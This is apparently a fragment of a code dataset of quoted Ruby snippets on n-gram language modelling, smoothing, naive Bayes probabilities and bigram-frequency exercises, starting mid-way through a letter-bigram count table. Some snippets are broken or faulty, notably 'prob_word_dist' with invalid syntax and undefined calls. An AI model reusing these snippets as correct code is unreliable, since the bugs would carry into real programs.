5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 
789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 
25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def calc_probability(actual_word, translation_word)\n d = levenshtein_distance(actual_word, translation_word)\n\n min_leng= actual_word.size < translation_word.size ? actual_word.size : translation_word.size\n p = 1.0 - d * 1.0 / min_leng\n p < 0 ? 0.0 : p\n end",
"def calculate_kn_probability next_ngram: nil, ngram_model: 0, discount: 0.25, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n \n return calculate_mle_probability(next_ngram: next_ngram, separator: separator) if local_ngram_model==1 # Recursion stops at the unigram model\n\n prefix_regex = /^#{next_ngram.split(separator)[0..-2].join(separator)}\\b/\n prefix = next_ngram.split(separator)[0..-2].join(separator)\n suffix = next_ngram.split(separator).last\n similar_ngrams = ngram_counts[local_ngram_model].select{|ngram, _| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown}\" if (@verbose and ngram.match(prefix_regex)); ngram.match(prefix_regex)}.count # Number of words which complete the current n-1 gram, e.g. for the n-gram \"your house looks nice\" we count \"yhl ugly\", \"yhl fine\" etc. Notice - we don't counts the number of occurences for \"yhl ugly\" etc but only the number of lower-order ngrams which complete the current ngram.\n puts \"#{'Total of '.red + similar_ngrams.to_s.red + ' found.'.red} Now calculating counts.\" if @verbose\n similar_ngrams_total_counts = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown} with raw count of #{counts}\" if (@verbose and ngram.match?(prefix_regex)); if ngram.match(prefix_regex) then acc += counts; else acc; end} # It's here that we actually sum up the counts\n puts \"#{'Total count is '.red + similar_ngrams_total_counts.to_s.red}\"\n ngrams_with_fixed_suffix = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{ngram.brown} / #{suffix.green} with raw count of #{counts}\" if (@verbose and ngram.match?(/^#{suffix}\\b/)); acc += counts if ngram.match?(/^#{suffix}\\b/); acc}\n\n first_term = [get_raw_counts(next_ngram).to_f - discount, 0].max / similar_ngrams_total_counts.to_f\n second_term = discount * (similar_ngrams.to_f/ngrams_with_fixed_suffix.to_f)\n \n return first_term + (second_term * calculate_kn_probability(next_ngram: next_ngram.split(separator)[1..-1].join(separator)))\n end",
"def p(trigram)\n\n bigram = trigram[1..2]\n unigram = trigram[2..2]\n # see which case we fall into for this backoff scheme\n if @counts.include?(trigram)\n # p1 function, trigram exists\n return pML(trigram, @discount)\n else\n ngram = nil\n beta_gram = nil\n alpha = 0\n if @counts.include?(bigram)\n # p2 function, no trigram but bigram exists\n ngram = bigram\n beta_gram = trigram[0..1] # the words used to help generate a beta-set of zero-count trigram\n # alpha mass redistribution\n alpha = @weights[:p2] * (1 - pML(trigram, @discount))\n else\n # p3 function, no trigram or bigram\n ngram = unigram\n beta_gram = trigram[0..0] # the words used to help generate a beta-set of zero-count bigrams\n # alpha mass redistribution\n alpha = @weights[:p3] * (1 - pML(trigram, @discount))\n end\n\n numerator = pML(ngram) \n denominator = @beta_gram_cache.fetch(beta_gram, nil) \n if not denominator\n dgram = nil\n sum = 0\n @vocab.each do |v| # all permutations of vocab words\n dgram = beta_gram + [v]\n # that are zero-count ngrams of (w,w_i-1,w_i-2) or (w,w_i-1)\n if not @counts.include?(dgram)\n # should be part of the sum of pML(w|w_i-1) or pML(w)\n sum += pML(dgram.drop(1)) # drop w_i-2 or w_i-1 as needed\n end\n end\n\n @beta_gram_cache.store(beta_gram, sum)\n denominator = sum\n end\n\n if denominator == 0 then return 0 end\n return alpha * numerator / denominator\n end\n\n end",
"def word_tag_probability(word, tag)\n denom = @tag_frequencies[tag]\n\n if denom.zero?\n 0\n else\n @word_tag_combos[\"#{word}/#{tag}\"] / denom.to_f\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def word_probability(word, category)\n total_words_in_category = total_word_count_in_category(category)\n return 0.0 if total_words_in_category == 0\n word_count(word, category).to_f / total_words_in_category\n end",
"def doc_probability(category)\n doc_prob = 1.0\n self.words.each do |word|\n doc_prob *= BayesCategory.where(:category=>category).first.word_probability(word[0])\n end\n doc_prob\n end",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= q(tokens[i-2..i])\n end\n probability\n end",
"def probability_of_ngrams(ngrams)\n probabilities = probabilities_for(ngrams).values\n \n return (probabilities.inject { |joint,prob| joint * prob } || 0.0)\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def score(other_counts)\n\t\tscore = 0.0\n\t\tseen = 0\n\t\tother_counts.each { |k, v|\n\t\t\tcount = @trigram_counts[k]\n\t\t\tscore += v * Math.log(@probs[@trigram_counts[k]])\n\t\t}\n\t\tscore\n\tend",
"def frequency_of(gram)\n @frequencies.fetch(gram,0)\n end",
"def probability_token_in_label(label, token)\n (@data[label][token] || 0).to_f / @doc_counts[label].to_f\n end",
"def weighted_probability(word)\n word = (Word === word ? word : get(word))\n\n p = BigDecimal.new(1)\n p = p * probability(word)\n p = p * file_probability(word, 1)\n #p = p * lexicon_weight(word)\n #p = p * weight_length(word)\n #p = p * weight_stem(word)\n #p = p * weight_plural(word)\n p\n end",
"def most_probable_next_word(string)\n words = string.split(\" \")\n bigram_key = words.last\n trigram_key = words.last(2).join(\" \") if words.count >= 2\n most_probable_word = \"\"\n\n ## if we can find trigram and trigram exists\n if words.count >= 2 and @trigrams[trigram_key] != nil\n # get w3 from grams with highest P(w1,w2,w3) = P(w1)*P(w2|w1)*P(w3|w1,w2)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(trigram_key + \" \" + word)\n # if P(w1)*P(w2|w1)*P(w3|w1,w2) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n\n puts \"ERROR IN TRIGRAMS\" if highest_probability == 0.0\n puts \"Trigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 3).round(4).to_s\n return most_probable_word\n ## if we can find a bigram and bigram exists\n elsif words.count >= 1 and @bigrams[bigram_key] != nil\n # get w2 from grams with highest P(w2|w1)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(bigram_key + \" \" + word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"ERROR IN BIGRAMS\" if highest_probability == 0.0\n puts \"Bigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 2).round(4).to_s\n return most_probable_word\n ## return random unigram?\n else\n highest_probability = 0.0\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"Unigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 1).round(4).to_s\n return most_probable_word\n end\n end",
"def get_token_probability(token, category_index)\n denom = @total_token_counts[category_index] + @token_counts[category_index].size * @prior_token_count \n if denom == 0\n return 0\n else\n return ((@token_counts[category_index][token] || 0) + @prior_token_count).to_f / denom\n end\n end",
"def wordprob(word, category)\n numerator = self.word_count_in_category(word, category) + 1\n denominator = self.all_word_count_in_category(category) + self.vocabularies.size\n return numerator / denominator\n end",
"def file_probability(word, threshold=0)\n word = (Word === word ? word : get(word))\n n = 1 # at least one\n word.files.each do |f, c|\n n += 1 if c > threshold\n end\n BigDecimal.new(n) / corpus_files.size\n end",
"def frequency(char)\n return 0 if (@size.nil? || @size <= 0)\n @map[char.upcase] * 100/@size\n end",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def pangram?\n return @hist.size == 26\n end",
"def probabilities\n Hash[ BayesCategory.all.to_a.collect { |word|\n [word.category, probability(word.category)]\n }]\n end",
"def prob_word_dist(arr)\n\tcounts = {}\n\t(0..arr[0].size-1).each do |i|\n\t\tcounts[i] = {}\n\tend\n\tarr.each do |word|\n\t\t(0..word.size-1).each do |i|\n\t\t\tif counts[i].has_key?(word[i]) then\n\t\t\t\tcounts[i][word[i]] += 1\n\t\t\telse\n\t\t\t\tcounts[i][word[i]] = 1\n\t\t\tend\n\t\tend\n\tend\n\tresult = []\n\t(0..arr.size-1).each do |i|\n\t\tcurr_word = \"\"\n\t\t(0..arr[0].size-1).each do |j|\n\t\t\ttemp_arr = []\n\t\t\tcounts[j].keys.each do |char|\n\t\t\t\t(1..counts[i][char]) do\n\t\t\t\t\ttemp_arr.push(char)\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurr_word += temp_arr[random * temp_arr.size]\n\t\tend\n\t\tresult.add[curr_word]\n\tend",
"def dictionary\n @dictionary ||= ngrams.first.probabilities \n end",
"def qML(ngram)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n # get a bigram\n dgram = ngram[0..1]\n when 2\n # get a unigram\n dgram= ngram[0..0]\n end\n\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n return @counts.fetch(ngram, 0).to_f / @counts.fetch(dgram, 0).to_f\n else\n # if the denominator count would be zero, return 0\n if @word_count == 0 then return 0 end\n return @counts.fetch(ngram, 0).to_f / @word_count.to_f\n end\n\n rescue ZeroDivisionError\n 0\n end",
"def calculate_gt_probability next_ngram: nil, ngram_model: 0, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n next_ngram_rawcount = ngram_counts[local_ngram_model][next_ngram].to_i\n\n if next_ngram_rawcount == 0 # Distributing P*(unseen)\n return good_turing_bins[local_ngram_model][1].to_f/good_turing_bins[local_ngram_model][0] if @oov_counts.nil? # if no oov are set, we assign the whole probability mass to every missing token\n return (@leftover_probability[local_ngram_model]/@oov_counts[local_ngram_model].values.sum)*@oov_counts[local_ngram_model][next_ngram] # otherwise we assign only part of it\n else\n revised_counts = get_revised_counts next_ngram: next_ngram, ngram_model: local_ngram_model\n return revised_counts.to_f/good_turing_bins[local_ngram_model][0]\n end\n end",
"def sentence_commonality(sentence)\n probability_of_ngrams(common_ngrams_from_sentence(sentence))\n end",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def word_prob(category, word)\n cat_freq = word_freq(category, word)\n non_cat_freq = word_freq(counter.keys, word) - cat_freq\n cat_docs = doc_size(category)\n non_cat_docs = doc_size(doc_counter.keys) - cat_docs\n\n cat_prob = [1.0 * cat_freq / cat_docs, 1.0].min\n non_cat_prob = [1.0 * non_cat_freq / non_cat_docs, 1.0].min\n\n if cat_prob == 0.0\n cond_prob = 0.4\n else\n cond_prob = 1.0 * cat_prob / (cat_prob + non_cat_prob)\n end\n\n # STDOUT.puts \"#{category}-#{word}, cat #{cat_prob}, non_cat #{non_cat_prob}, cond_p #{cond_prob}\"\n\n cond_prob = [[cond_prob, 0.99].min, 0.01].max\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def text_commonality(text)\n probability_of_ngrams(common_ngrams_from_text(text))\n end",
"def most_frequent_bigram(str)\n count = Hash.new(0)\n\n (0...str.length - 1).each do |i|\n bigram = str[i..i + 1]\n\n count[bigram] += 1\n end\n\n count.sort_by { |k, v| v } [-1][0]\nend",
"def pML(ngram, discount=0)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n dgram = ngram[0..1]\n when 2\n dgram= ngram[0..0]\n end\n\n result = 0\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @counts.fetch(dgram, 0).to_f\n else\n if @word_count == 0 then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @word_count.to_f\n end\n\n# puts \"#{ngram.inspect} #{result}\"\n return result\n\n rescue ZeroDivisionError\n 0\n end",
"def word_prob(word, type)\n total_words_in_type = total_word_count_in_type(type)\n return total_words_in_type == 0 ? 0.0 : word_count(word, type).to_f / total_words_in_type\n end",
"def probability\n return @probability\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= p(tokens[i-2..i])\n end\n probability\n end",
"def most_frequent_bigram(str)\n counts = Hash.new(0)\n (0...str.length-1).each do |i|\n bigram = str[i..i + 1]\n counts[bigram] += 1\n end\n\n sorted = counts.sort_by { |h,v| v } # sorts by value \n sorted.last[0]\nend",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def word_frequency(text)\n norm_array = normalize(text).to_a\n freq = { }\n norm_array.each_with_object(Hash.new(0)){|key,hash| hash[key] += 1}\nend",
"def document_frequency\n @corpus.each_with_object({}) do |doc, df|\n doc.bag_of_words.keys.each do |word|\n df[word] = (df.fetch(word) { 0.0 }) + 1.0\n end\n end\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def calculate_match_probability\n # two heuristics: \n # 1 is are their multiple words in term_text? if so, mark as probable\n # if not, does it match the anchor regexp? if so, mark as probable\n # else, mark as improbable\n \n # multiple words?\n anchor_regexp = \"(featuring|plus|the|presents|with|plus|and|\\,|\\&|[()]|\\/|\\:|\\-|^|$)\"\n nix_regexp = \"parking|\\svs\\.?\\s\" \n if artist_name=~/#{nix_regexp}/i\n self.match_probability=\"unlikely\"\n return nil\n end\n text=term_text.strip\n if text[\" \"]\n self.match_probability=\"likely\"\n return \"multpl\"\n end\n if artist_name=~/#{anchor_regexp}\\s*#{text}\\s*#{anchor_regexp}/i\n self.match_probability=\"likely\"\n return \"regexp\"\n end\n# if artist_name=~/#{anchor_regexp}\\s+?#{text}\\s+?#{anchor_regexp}/i\n# match_probability=\"likely\"\n# return \"regexp\"\n# end\n self.match_probability=\"unlikely\"\n return nil\n end",
